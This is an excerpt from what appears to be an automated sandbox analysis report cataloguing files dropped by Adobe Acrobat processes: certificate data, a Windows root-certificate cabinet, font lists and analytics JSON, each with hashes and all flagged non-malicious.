                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                          Malicious:false
                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                          Category:dropped
                          Size (bytes):71954
                          Entropy (8bit):7.996617769952133
                          Encrypted:true
                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                          Malicious:false
                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):192
                          Entropy (8bit):2.736068239839641
                          Encrypted:false
                          SSDEEP:3:kkFklp9aDVXfllXlE/HT8kVlJtNNX8RolJuRdxLlGB9lQRYwpDdt:kK9DmT8cRNMa8RdWBwRd
                          MD5:034608F57CB655261B0DF81F13D42CC7
                          SHA1:9573B296BFCFFF30956B007172ABE268CB44A86C
                          SHA-256:724DCE1AFF4E75B7E9876F4550D9AEBEC8EB489314B0F929A950C9BAE565F3AD
                          SHA-512:F49065F5A3EAC3717A3694970FD381D2152BB1EF7277A891AB29F6828ECC0719A2D452012286CC41F278174CD23DE555E64A7BE8757E40EB2CB563636564E1CB
                          Malicious:false
                          Preview:p...... ........Z..)-g..(....................................................... ..........W.....d..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):328
                          Entropy (8bit):3.247897867253901
                          Encrypted:false
                          SSDEEP:6:kKxNi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:JzDImsLNkPlE99SNxAhUe/3
                          MD5:8D3304022301C4A9F12115BF90C4EE97
                          SHA1:39511EC79E719F9B8A7A78629F38B18206B4F63B
                          SHA-256:8768B91F7D4C3821DF1F869A458C61598B8EFC456EFF85DB8CEA7952A234E39A
                          SHA-512:F090B3A1D2413065984E0EBEB06CB15CF90F5B8F5379F6FBDFA5C3026BACE2AB2DB6CE4C928889401662690707C0EDECC15651CCC0F67FA346594F59BB107015
                          Malicious:false
                          Preview:p...... ..........;-g..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):1233
                          Entropy (8bit):5.233980037532449
                          Encrypted:false
                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                          Malicious:false
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):1233
                          Entropy (8bit):5.233980037532449
                          Encrypted:false
                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                          Malicious:false
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):1233
                          Entropy (8bit):5.233980037532449
                          Encrypted:false
                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                          Malicious:false
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):10880
                          Entropy (8bit):5.214360287289079
                          Encrypted:false
                          SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                          MD5:B60EE534029885BD6DECA42D1263BDC0
                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                          Malicious:false
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:PostScript document text
                          Category:dropped
                          Size (bytes):10880
                          Entropy (8bit):5.214360287289079
                          Encrypted:false
                          SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                          MD5:B60EE534029885BD6DECA42D1263BDC0
                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                          Malicious:false
                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):295
                          Entropy (8bit):5.38073998003457
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJM3g98kUwPeUkwRe9:YvXKXv47wEZc0vgGMbLUkee9
                          MD5:F9A3788886041EA88713063585EED45E
                          SHA1:72623C9377910EBDC1383AC5FB34928D98F7269A
                          SHA-256:7E9BA9AFEE44392BC703675F5533DA85B021546030D2D5D4B887EB9E0A8E7D07
                          SHA-512:9B8C0B0457594288789EDC67E7A2AA1724A8EAF4D443B50E79B9E42A3D681E21942F1C371EDF1D90AECEFE7BBD6E2A4D3E1D9601A1077EA1465543916B5B9272
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):294
                          Entropy (8bit):5.328950406124096
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJfBoTfXpnrPeUkwRe9:YvXKXv47wEZc0vgGWTfXcUkee9
                          MD5:DD8182590BD98C564BD37339ED6E028F
                          SHA1:92999E85D3E0AEEE4768C9373624C0657BC83642
                          SHA-256:6353F078DF47A08ADF65654C3748F68911FCC847F66FEC1DAB1FE560D103BDD0
                          SHA-512:3785B6EE61205B7C98A89A790F222896FBE80B5F10572411892D37E77371FDD4A40A97BF9DD351567F9C56B9F374750A63D70A7829760F84A09767329721278A
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):294
                          Entropy (8bit):5.306711476495922
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJfBD2G6UpnrPeUkwRe9:YvXKXv47wEZc0vgGR22cUkee9
                          MD5:24C13EBE144AFFCDB3676EEFE6FA63FA
                          SHA1:E86AB59716C0C1715EADF092D214521DE70B0FF2
                          SHA-256:1DCE60D79E07390DDE3FA65D8870B665FC391C72ED232C8AE977E26947122D1B
                          SHA-512:BAA79749469BB2BE85E4F23E893141B4BFF3FFEE9C1D0EEA724E31F093FBB839F8E5D0CC76E47E9E756FB0AA8E8A98FBF98C268E853B870259AD118AB8BC1CE3
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):285
                          Entropy (8bit):5.368360191272445
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJfPmwrPeUkwRe9:YvXKXv47wEZc0vgGH56Ukee9
                          MD5:E8EC8A473F79FB1680DC6E6DC529FAEE
                          SHA1:2F1E2FCBC1D7BB256E40F4FBF4FC0E21AE1CCFA2
                          SHA-256:E5804411601C73117A1C5A5FE671FB4E2ECD282D97FA564D0C1BCA033FF927BF
                          SHA-512:0DFDB18916CBA365C4BE7CCF8BF6AC57ECBE366C7B965EAB8120C30AFD4B78C33FC74AC47D82609E30A567C2DC72BC3B1C2072E1F348935039145C7B71B1882F
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):1123
                          Entropy (8bit):5.68615497160359
                          Encrypted:false
                          SSDEEP:24:Yv6Xv47wEzv9pLgE9cQx8LennAvzBvkn0RCmK8czOCCSU:YvBlhgy6SAFv5Ah8cv/U
                          MD5:6CEBC003D9F6064436193CF73D7F36CE
                          SHA1:A3246BC343429710F365398AC259DAFADB5D5650
                          SHA-256:E87234B2739C4AF1F89AA223E2FBD63EB4D56E53A72FDAB17D7F813651E01227
                          SHA-512:40EE9405CB0141F602B64E05E7D89C43B3C682A64D0FE35A17E0B07F08973FD2631CB7247E397782081CB75ADF517A60868A7CC2D1DA9BE62D916739A316F4B7
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):289
                          Entropy (8bit):5.31262777125618
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJf8dPeUkwRe9:YvXKXv47wEZc0vgGU8Ukee9
                          MD5:59E8BD5D8497750A0D680C1D4DFBA466
                          SHA1:D29FBCA04D19E23E2BE890C9681487CC3CFB0FB9
                          SHA-256:11E25EAED1D53CCE93994FCB4804E0653C974003E29A16A2B8EAD730780DF416
                          SHA-512:37F384E30C5D1B01D84522629886FD8F57117A1A0C3D72A6602CA074930F7C52F667C6F7B4DC4E7632F74D42A52377F69173E43B09576A5BEB11CD5951385666
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):292
                          Entropy (8bit):5.3160896721231445
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJfQ1rPeUkwRe9:YvXKXv47wEZc0vgGY16Ukee9
                          MD5:BC913956F4DA66CC9A2A33E080D8EA05
                          SHA1:89771D3757497D26CB10C4FF5D09F54D8EAA5E02
                          SHA-256:70768D52C1F66646E3C259ED4115664468EAAF002F0E43533B6FF74DB00CB2B5
                          SHA-512:16CECFE8941B7E33E20056BE9959102B0D07A10F4FC75B3CF3F3E406B6C1F471FFDD627ED96F9395181F4BFF3F4E7FB856725BC6C46CB72515D0798909697C90
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):289
                          Entropy (8bit):5.32196588836154
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJfFldPeUkwRe9:YvXKXv47wEZc0vgGz8Ukee9
                          MD5:4857215E50A36ED4A9E4A3CDF070EB79
                          SHA1:CF036CCC5C97C89D41BB49F7EF3F3EDF7AB6D9AC
                          SHA-256:34D7C6A58C14AD1AD72FC59E06B456A3BC028FA9BC695765B372278BF34E1244
                          SHA-512:A30E1DF60DF5F32E1169E9C4DA909D52B6B52C108B158B5DDFFB4465BC70A8E776786F66D9CBC92025404ABC5BEF261C77E844CF117EFB0DAB3EAF11E3B3C31F
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):295
                          Entropy (8bit):5.339031137708453
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJfzdPeUkwRe9:YvXKXv47wEZc0vgGb8Ukee9
                          MD5:3C29BDAB598FF23F9306B4ED32164388
                          SHA1:B9A1F3407D94C45884407C29ABF07F87714CCEE2
                          SHA-256:D3A1E6BAE15D898F1E9D6C800ABE9C959296C1A85C98B80308544C34D59D54EF
                          SHA-512:B6A5F89A075F8A2A795CC1A8FDD500D9A6437EC7FB85FD95ADA62474FD5FC4D4ABADF785049E5537440A6D2B33A3CC84FAF518E9A7773DDABAA217E866858D84
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):289
                          Entropy (8bit):5.319789384555806
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJfYdPeUkwRe9:YvXKXv47wEZc0vgGg8Ukee9
                          MD5:71FBFF3814F2C12B970FD1B84953C626
                          SHA1:FFF8996F38962D1CA76A0FD2F92B4D804FA92694
                          SHA-256:A3712C08B28E6635B52A07CA21A0AA9523C7783412BD8D0C652E247433A3D881
                          SHA-512:CEB0F68DEC698EB58591D1F7D1B66F5D7E2B175AFB46F4A3DCF54E421C33EF7E838E1286084A08C3F6510768E9269BA217C95F1E52DB7B1ACBE1AB49A0731C68
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):284
                          Entropy (8bit):5.306487152963993
                          Encrypted:false
                          SSDEEP:6:YEQXJ2HXv47KUO9VoZcg1vRcR0YooAvJf+dPeUkwRe9:YvXKXv47wEZc0vgG28Ukee9
                          MD5:657DC3C25D83A6DE94EDF5A0A910FB8B
                          SHA1:F8F2BD435AF7A43969DD83FAC171FB15C53E6943
                          SHA-256:4A5E404F88462BC8850DA5029E3419E68C96A18BAE44024376743FB1BE1DA10E
                          SHA-512:3872737EEED01F7FB2CB070A79C171E9BA3ADACD2E262727421AFD2F112E019797903AB764BA1811DC593FAC71AE619CC6F6D1553F3E373E405496F5C13879B5
                          Malicious:false
                          Preview:{"analyticsData":{"responseGUID":"3956dc0b-1bcf-4bce-a73e-1232ddc874bf","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1737112109395,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):291
